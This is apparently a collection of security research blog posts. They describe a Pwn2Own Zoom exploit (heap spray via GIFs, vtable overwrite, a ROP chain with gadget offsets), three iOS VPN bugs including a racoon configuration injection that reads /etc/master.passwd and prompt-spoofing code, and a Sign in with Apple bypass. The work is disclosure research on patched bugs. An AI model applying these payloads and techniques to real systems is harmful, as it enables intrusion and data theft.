The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL: the file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom; only then would the destructor call some vtable functions.

class FileWrapperImpl : public FileWrapper {
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: it would mean we had just one shot in each attempt. If we failed to overwrite a vtable, we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance of exiting successfully was small. The information leak will have corrupted many objects and heap metadata in the previous phase; this may not affect anything while those objects remain unused, but attempting to exit could cause a crash due to destructors being called or memory being freed.

Based on the WebRTC source code, we noticed that FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at the time did not have an emulated sound card; there was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested adding one, because it could matter for these objects. Thijs was skeptical, but security research involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With an emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing: each loop of the ringtone seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing complete a couple of full loops at the moment Zoom exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user-uploaded GIF file instead, we found that we could trigger the download of arbitrarily sized GIF files. If the file is a valid GIF file, it is loaded into memory. If we send the same link again, it is not downloaded twice; instead, a new copy is allocated in memory. This is the second low-impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs:</body>
  <active xmlns=""/>
    <format>%1$@ sent you an image</format>
      <arg>John Doe</arg>
    <from n="John Doe" res="ZoomChat_pc"/>
  <giphyv2 id="YQitE4YNQNahy" url="" tags="hacker">
    <pcInfo url="" size="1456787"/>
    <mobileInfo url="" size="549356"/>
    <bigPicInfo url=" 1aWl62KifvJ_LDECBM1" size="4322534"/>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs:</body>
  <active xmlns=""/>
    <format>%1$@ sent you an image</format>
      <arg>John Doe</arg>
    <from n="John Doe" res="ZoomChat_pc"/>
  <giphyv2 id="YQitE4YNQNahy" url="" tags="hacker">
    <pcInfo url="" size="1456787"/>
    <mobileInfo url="" size="549356"/>
    <bigPicInfo url="[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.
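
As a rough illustration, this is how such a spray file could be constructed (a minimal sketch assuming 4 KiB pages; the minimal GIF header and the payload offsets below are illustrative, not the exact values from our exploit):

# Sketch of the spray-GIF construction, assuming 4 KiB pages.
PAGE = 4096

# A minimal valid GIF: signature, 1x1 logical screen descriptor, trailer.
# Decoders accept the file even with arbitrary data after the trailer.
gif_header = b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00\x00\x00" + b"\x3b"

page = bytearray(PAGE)
page[:len(gif_header)] = gif_header

# Place the data we need (fake vtable entries, strings, shellcode) at fixed
# offsets within the page, so that any page-aligned address inside the spray
# has them at known offsets from the page boundary.
page[0x100:0x104] = (0x41414141).to_bytes(4, "little")           # e.g. a pointer slot
page[0x200:0x200 + 26] = "kernel32.dll\x00".encode("utf-16-le")  # UTF-16 string

# Repeat the page to get a ~25 MB GIF; allocating it enough times puts
# around 512 MB of controlled, page-aligned data in the 32-bit address space.
spray_gif = bytes(page) * (25 * 1024 * 1024 // PAGE)

With enough copies mapped, picking a "known" address like GIF_BASE below is then just a matter of choosing a value that is likely to fall inside the spray.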

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The technique we used is known as a stack pivot: we replaced the stack pointer with the address of data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 

This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and how, when Close is called, the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then the ROP chain starts by calling GetModuleHandleW with the string "kernel32.dll" from our GIF file as its argument. Finally, when returning from that function, a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp

POP_RET, # Not used, padding for other objects
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
SHELLCODE & 0xfffff000,

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting the exploit to an acceptable reliability level. As we mentioned in the section on the info leak, this phase was very tricky. It took a lot of time to get to the point where it had even a tiny chance of succeeding. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability, and many more we tried and gave up on. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn't, and decreasing the chance that the client would crash when we had overwritten something we didn't intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.
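
As an illustration, a fake "do nothing" vtable could look something like this (a sketch in the style of our exploit code; the gadget offsets are hypothetical, not the real offsets in libcrypto-1_1.dll):

# Illustrative only: one "no-op" gadget per calling convention, so an
# accidental virtual call through the fake vtable leaves the stack balanced.
RET_0 = crypto_base + 0x10001  # ret      (caller cleans up, no stack args)
RET_4 = crypto_base + 0x10002  # ret 4    (callee pops one 4-byte argument)
RET_8 = crypto_base + 0x10003  # ret 8    (callee pops two 4-byte arguments)

# A fake vtable used to patch up objects we overwrote by accident: each slot
# gets the no-op whose stack cleanup matches that virtual function.
noop_vtable = [
    RET_0,  # slot 0: e.g. a destructor taking no stack arguments
    RET_4,  # slot 1: a method taking one stack argument
    RET_8,  # slot 2: a method taking two stack arguments
]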

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest; anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts often took close to 5 minutes, so even just doing 10 attempts took an hour, and 10 runs is a small sample for assessing whether a change actually improved the reliability.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.
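
In pseudocode, the escalation looked roughly like this (the helper functions and limits are hypothetical; only the shape matches what our exploit did):

# Sketch of the escalation strategy: start careful, take more risk per loop.
def run_phase(max_iterations=50):
    for iteration in range(max_iterations):
        # Few, small overflows at first; escalate the count and the size
        # classes the longer we go without a hit.
        overflow_count = min(1 + iteration, 10)
        size_classes = SIZE_CLASSES[: 1 + iteration // 5]
        for _ in range(overflow_count):
            for size in size_classes:
                trigger_overflow(size)
        if check_success():
            return True
    return False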

In the second phase we could take more risks: the application did not need to remain stable enough for another phase, and we only needed two adjacent allocations, not a third unallocated block as well. By overwriting 10 blocks past our allocation, we had a very good chance of hitting the needed object within just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success within the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.dll in one run and then skip the info leak in the next run (the locations of ASLR-randomized DLLs remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that: the first attempt failed in the first phase.


After we handed in our final exploit, the nerve-wracking wait began. We had to hand it in two days before the event, and the organizers would not run it until our attempt, so it was out of our hands. Even during the attempt we could not see the attacker's screen, for example, so we had no idea whether everything worked as planned. The enormous relief when calc.exe popped up made it all worth it in the end.

In total we spent around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all the Windows internals involved.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

iOS VPN support: 3 different bugs

7 October 2020 at 00:00

Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.

For VPNs there are actually three variants that a Network Extension can implement: a “Personal VPN”, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the code for the VPN itself, either as a “Packet Tunnel Provider” or an “App Proxy Provider”. We did not spend any time on the latter two, but only investigated Personal VPNs.

To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.

Bug 1: App spoofing

To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:

@interface NEConfiguration : NSObject <NEConfigurationValidating,
			NEProfilePayloadHandlerDelegate, NSCopying, NSSecureCoding> {
    NEVPN * _VPN;
    NEAOVPN * _alwaysOnVPN;
    NEVPNApp * _appVPN;
    NSString * _application;
    NSString * _applicationIdentifier;
    NSString * _applicationName;
    NEContentFilter * _contentFilter;
    NSString * _externalIdentifier;
    long long  _grade;
    NSUUID * _identifier;
    NSString * _name;
    NEPathController * _pathController;
    NEProfileIngestionPayloadInfo * _payloadInfo;

It turns out that the permission prompt used that name, instead of the actual name of the app that the user would be familiar with. Because that name is part of an object received from the app, it could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could attempt to obfuscate what the prompt is actually asking, for example by making it seem like a prompt about installing a software update (where users would expect to enter their passcode).

It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.

So, by calling these private methods:

NEVPNManager *manager = [NEVPNManager sharedManager];
NEConfiguration *configuration = [manager configuration];

[configuration setApplication:nil];
[configuration setApplicationName:@"New Network Settings for 4G"];

[manager saveToPreferencesWithCompletionHandler:^(NSError *error) {
    /* ... */
}];

This results in the following permission prompt:

And this configuration is not automatically removed when uninstalling the app.

Apple fixed this issue in the iOS 14 update.

Bug 2: Configuration file injection (CVE-2020-9836)

IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:

Important Note

The development of ipsec-tools has been ABANDONED.

ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!

Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.

While playing around with the configuration options, we noticed a strange error whenever we included a " character in the “Group name” or “Account Name” values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.

Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.

One interesting option that did work was the following:

A"; my_identifier keyid file "/etc/master.passwd

This results in the following line in the configuration file:

	my_identifier keyid_use "A"; my_identifier keyid file "/etc/master.passwd";

This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:

Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:

  • /var/root/Library/
  • /private/etc/
  • /Library/Preferences/

There is, however, an important limitation. The group name is added to the initial handshake message. This packet is sent over UDP; therefore, the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any file larger than 65,535 bytes, minus the overhead of the rest of the packet and the IP and UDP headers, can not be read.

For example, the following files were found to often be below the limit and may contain sensitive information that would normally not be available to an app:

  • /Library/Preferences/SystemConfiguration/
  • /private/var/root/Library/Lockdown/data_ark.plist

By exploiting this issue, a Network Extension app could read files that would normally not be allowed due to the app sandbox. Other potential impact could be accessing Keychain items, or deleting files in those directories by changing the pid file location.

Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.

Bug 3: OOB reads (CVE-2020-9837)

As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era one was even used for a jailbreak), but likely because there is no upstream project, these fixes were often incorrect or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.

A common pattern in racoon for parsing packets containing a list of elements is the following. The start of the list is cast to a struct with the same representation as the element header (d). A variable keeps track of the remaining length of the buffer (tlen). Then, a loop is started. In each iteration, it handles the current element, then advances the struct to the next element and decreases the number of remaining bytes by the size of the current element. If that number becomes negative or zero, the loop ends.

For example, ipsec_doi.c:534-772:

/*
 * get ISAKMP data attributes
 */
static int
t2isakmpsa(trns, sa)
	struct isakmp_pl_t *trns;
	struct isakmpsa *sa;
{
	struct isakmp_data *d, *prev;
	int flag, type;
	int error = -1;
	int life_t;
	int keylen = 0;
	vchar_t *val = NULL;
	int len, tlen;
	u_char *p;

	tlen = ntohs(trns->h.len) - sizeof(*trns);
	prev = (struct isakmp_data *)NULL;
	d = (struct isakmp_data *)(trns + 1);

	/* default */
	sa->lifebyte = 0;
	sa->dhgrp = racoon_calloc(1, sizeof(struct dhgroup));
	if (!sa->dhgrp)
		goto err;

	while (tlen > 0) {

		type = ntohs(d->type) & ~ISAKMP_GEN_MASK;
		flag = ntohs(d->type) & ISAKMP_GEN_MASK;

		plog(LLV_DEBUG, LOCATION, NULL,
			"type=%s, flag=0x%04x, lorv=%s\n",
			s_oakley_attr(type), flag,
			s_oakley_attr_v(type, ntohs(d->lorv)));

		/* get variable-sized item */
		switch (type) {
		case OAKLEY_ATTR_GRP_PI:
		case OAKLEY_ATTR_GRP_GEN_ONE:
		case OAKLEY_ATTR_GRP_GEN_TWO:
		case OAKLEY_ATTR_GRP_CURVE_A:
		case OAKLEY_ATTR_GRP_CURVE_B:
		case OAKLEY_ATTR_SA_LD:
		case OAKLEY_ATTR_GRP_ORDER:
			if (flag) {	/*TV*/
				len = 2;
				p = (u_char *)&d->lorv;
			} else {	/*TLV*/
				len = ntohs(d->lorv);
				if (len > tlen) {
					plog(LLV_ERROR, LOCATION, NULL,
						"invalid ISAKMP-SA attr, attr-len %d, overall-len %d\n",
						len, tlen);
					return -1;
				}
				p = (u_char *)(d + 1);
			}
			val = vmalloc(len);
			if (!val)
				return -1;
			memcpy(val->v, p, len);
			break;

		default:
			break;
		}

		switch (type) {
		case OAKLEY_ATTR_ENC_ALG:
			sa->enctype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_HASH_ALG:
			sa->hashtype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_AUTH_METHOD:
			sa->authmethod = ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_DESC:
			sa->dh_group = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			if (type == OAKLEY_ATTR_GRP_TYPE_MODP)
				sa->dhgrp->type = type;
			else
				return -1;
			break;
		}
		case OAKLEY_ATTR_GRP_PI:
			sa->dhgrp->prime = val;
			break;

		case OAKLEY_ATTR_GRP_GEN_ONE:
			if (!flag)
				sa->dhgrp->gen1 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen1 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen1, d + 1, len);
				sa->dhgrp->gen1 = ntohl(sa->dhgrp->gen1);
			}
			break;

		case OAKLEY_ATTR_GRP_GEN_TWO:
			if (!flag)
				sa->dhgrp->gen2 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen2 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen2, d + 1, len);
				sa->dhgrp->gen2 = ntohl(sa->dhgrp->gen2);
			}
			break;

		case OAKLEY_ATTR_GRP_CURVE_A:
			sa->dhgrp->curve_a = val;
			break;

		case OAKLEY_ATTR_GRP_CURVE_B:
			sa->dhgrp->curve_b = val;
			break;

		case OAKLEY_ATTR_SA_LD_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			switch (type) {
			case OAKLEY_ATTR_SA_LD_TYPE_SEC:
			case OAKLEY_ATTR_SA_LD_TYPE_KB:
				life_t = type;
				break;
			default:
				life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
				break;
			}
			break;
		}
		case OAKLEY_ATTR_SA_LD:
			if (!prev
			 || (ntohs(prev->type) & ~ISAKMP_GEN_MASK) !=
					OAKLEY_ATTR_SA_LD_TYPE) {
				plog(LLV_ERROR, LOCATION, NULL,
					"life duration must follow ltype\n");
				break;
			}

			switch (life_t) {
			case OAKLEY_ATTR_SA_LD_TYPE_SEC:
				sa->lifetime = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifetime == 0) {
					plog(LLV_ERROR, LOCATION, NULL,
						"invalid life duration.\n");
					goto err;
				}
				break;
			case OAKLEY_ATTR_SA_LD_TYPE_KB:
				sa->lifebyte = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifebyte == 0) {
					plog(LLV_ERROR, LOCATION, NULL,
						"invalid life duration.\n");
					goto err;
				}
				break;
			default:
				vfree(val);
				plog(LLV_ERROR, LOCATION, NULL,
					"invalid life type: %d\n", life_t);
				goto err;
			}
			break;

		case OAKLEY_ATTR_KEY_LEN:
		{
			int len = ntohs(d->lorv);
			if (len % 8 != 0) {
				plog(LLV_ERROR, LOCATION, NULL,
					"keylen %d: not multiple of 8\n",
					len);
				goto err;
			}
			sa->encklen = (u_int16_t)len;
			keylen++;
			break;
		}
		case OAKLEY_ATTR_PRF:
		case OAKLEY_ATTR_KEY_ROUND:
			/* unsupported */
			break;

		case OAKLEY_ATTR_GRP_ORDER:
			sa->dhgrp->order = val;
			break;

		default:
			break;
		}

		prev = d;
		if (flag) {
			tlen -= sizeof(*d);
			d = (struct isakmp_data *)((char *)d + sizeof(*d));
		} else {
			tlen -= (sizeof(*d) + ntohs(d->lorv));
			d = (struct isakmp_data *)((char *)d + sizeof(*d) + ntohs(d->lorv));
		}
	}

	/* key length must not be specified on some algorithms */
	if (keylen) {
		if (sa->enctype == OAKLEY_ATTR_ENC_ALG_DES
		 || sa->enctype == OAKLEY_ATTR_ENC_ALG_3DES) {
			plog(LLV_ERROR, LOCATION, NULL,
				"keylen must not be specified "
				"for encryption algorithm %d\n",
				sa->enctype);
			return -1;
		}
	}

	return 0;
err:
	return error;
}

In 9 places in the code, this pattern was used without a check at the start of the loop body that the remainder of the list contained at least as many bytes as the header is long, nor was there a check after the parsing that the number of remaining bytes was exactly 0. This means that for the last iteration of the loop, the struct may contain fields that are filled with data past the end of the buffer.

In some cases where variable-length elements are used, the check of whether the buffer had enough data for the variable-length part was also slightly off, again due to failing to take into account the length of the header of the current element. In the example above, on line 587 the code checks that len > tlen, but this fails to take into account that the size of the element's header has not yet been subtracted from tlen (as can be seen at line 753).
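
To make these off-by-a-few problems concrete, here is a toy model of the loop in Python (this is not racoon's actual code; in C, the reads marked as bugs silently run past the buffer instead of raising an error):

# Toy model of the parsing loop, assuming a 4-byte element header:
# 2 bytes type, 2 bytes length-or-value (lorv).
import struct

def parse_attributes(buf: bytes, tlen: int):
    off = 0
    while tlen > 0:
        # Bug 1: no check that tlen >= 4, so for a truncated final element
        # the C code reads header fields past the end of the buffer.
        typ, lorv = struct.unpack_from(">HH", buf, off)
        if typ & 0x8000:                  # TV form: value stored in the header
            off, tlen = off + 4, tlen - 4
        else:                             # TLV form: variable-length value follows
            # Bug 2: the length is compared against tlen before the 4-byte
            # header has been subtracted, so the value may extend past the
            # advertised end of the element list.
            if lorv > tlen:
                raise ValueError("invalid attribute length")
            off, tlen = off + 4 + lorv, tlen - (4 + lorv)
    # Bug 3: no check that tlen == 0 here; a negative value means the last
    # element overlapped the end of the buffer.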

The end result was that in many places where packets are being parsed it was possible to read a couple of additional bytes from the buffer as if they are part of the packet. In many cases, it was possible to observe information about those bytes externally. For example, depending on the element type, the connection might be aborted if an OOB byte was 0x00.

These were fixed by Apple in iOS 13.5 (CVE-2020-9837).


VPNs are intended to offer security for users on an untrusted network. However, with the introduction of Network Extensions, the OS now also needs to protect itself against a potentially malicious VPN app. Properly securing an existing feature for such a new context is difficult. This is even more difficult due to the use of an existing, but abandoned, project. The way racoon is written, C code with complicated pointer arithmetic, makes spotting these bugs very difficult. It is very likely that more memory corruption bugs can be found in it.

Sign in with Apple - authentication bypass

1 July 2020 at 00:00

A couple of weeks ago we found a vulnerability that could be used to gain unauthorized access to an iCloud account, by abusing a new feature allowing TouchID to log in to websites.

In iOS 13 and macOS 10.15, Apple added the possibility to sign in on Apple’s own sites using TouchID/FaceID in Safari on devices which include the required biometric hardware.

When you visit any page with a login form for an Apple account, a prompt is shown offering to authenticate using TouchID instead. If you authenticate, you're immediately logged in. This skips the 2-factor authentication step you would normally need to perform when logging in with your password. This makes sense, because the process can be considered to already require two factors: your biometrics and the device. You can cancel the prompt to log in normally, for example if you want to use a different AppleID than the one signed in on the phone.

We expect that the primary use-case of this feature is not signing in on iCloud (as that is pretty rare to do in Safari on a phone); rather, the main motivator was likely “Sign in with Apple” on the web, for which this feature works as well. For those sites, additional options are shown when creating a new account, for example whether to hide your email address.

Although all of this works on both macOS and iOS, with TouchID and FaceID, and for all sites using AppleID logins, we'll use iOS and TouchID to explain the vulnerability, but keep in mind that the impact is broader.

Logging in on Apple domains happens using OAuth2. On icloud.com, this uses the web_message mode. This works as follows when doing a normal login:

  1. The page embeds an iframe pointing to the OAuth2 authorization URL, which includes the client_id and redirect_uri parameters and response_type=code.
  2. The user logs in (including steps such as entering a 2FA-token) inside the iframe.
  3. If the authentication succeeds, the iframe posts a message back to the parent window containing a grant_code for the user, using window.parent.postMessage(<token>, <target origin>) in JavaScript.
  4. The grant_code is used by the page to continue the login process.

Two of the parameters are very important in the iframe URL: the client_id and redirect_uri. The server keeps track of a list of registered clients and the redirect URIs that are allowed for each client. In the case of the web_message flow, the redirect URI is not used as a real redirect, but instead it is used as the required page origin of the posted message with the grant code (the second argument for postMessage).

For all OAuth2 modes, it is very important that the authentication server validates the redirect URI correctly. If it does not do that, then the user's grant_code could be sent to a malicious webpage instead. When logging in on the website, this check is performed correctly: changing the redirect_uri to anything else results in an error page.

When the user authenticates using TouchID, the iframe is handled differently, but the outer page remains the same. When Safari detects a new page with a URL matching the example URL above, it does not download the page, but invokes the process AKAppSSOExtension instead. This process communicates with the AuthKit daemon (akd) to handle the biometric authentication and to retrieve a grant_code. If the user successfully authenticates, then Safari injects a fake response to the pending iframe request, which posts the message back in the same way the normal page would if the authentication had succeeded. akd communicates with an API on an Apple server, to which it sends the details of the request and from which it receives a grant_code.

What we found was that the API had a bug: even though the client_id and redirect_uri were included in the data submitted to it by akd, it did not check that the redirect URI matched the client ID. Instead, there was only a whitelist applied by AKAppSSOExtension on the domains: all domains ending in apple.com, icloud.com and icloud.com.cn were allowed. That may sound secure enough, but keep in mind that apple.com has hundreds (if not thousands) of subdomains. If any of these subdomains can somehow be tricked into running malicious JavaScript, then it could be used to trigger the prompt for a login with the iCloud client_id, allowing that script to retrieve the user's grant code if they authenticate. The page can then send it to an attacker, who can use it to obtain a session on icloud.com.

Some examples of how that could happen:

  • A cross-site scripting vulnerability on any subdomain. These are found quite regularly; one public list contains at least 30 candidates from 2019, and that only covers the domains that are important enough to investigate.
  • A dangling subdomain that can be taken over by an attacker. While we are not aware of any instances of this happening to Apple, someone recently found 670 subdomains of microsoft.com that were available for takeover.
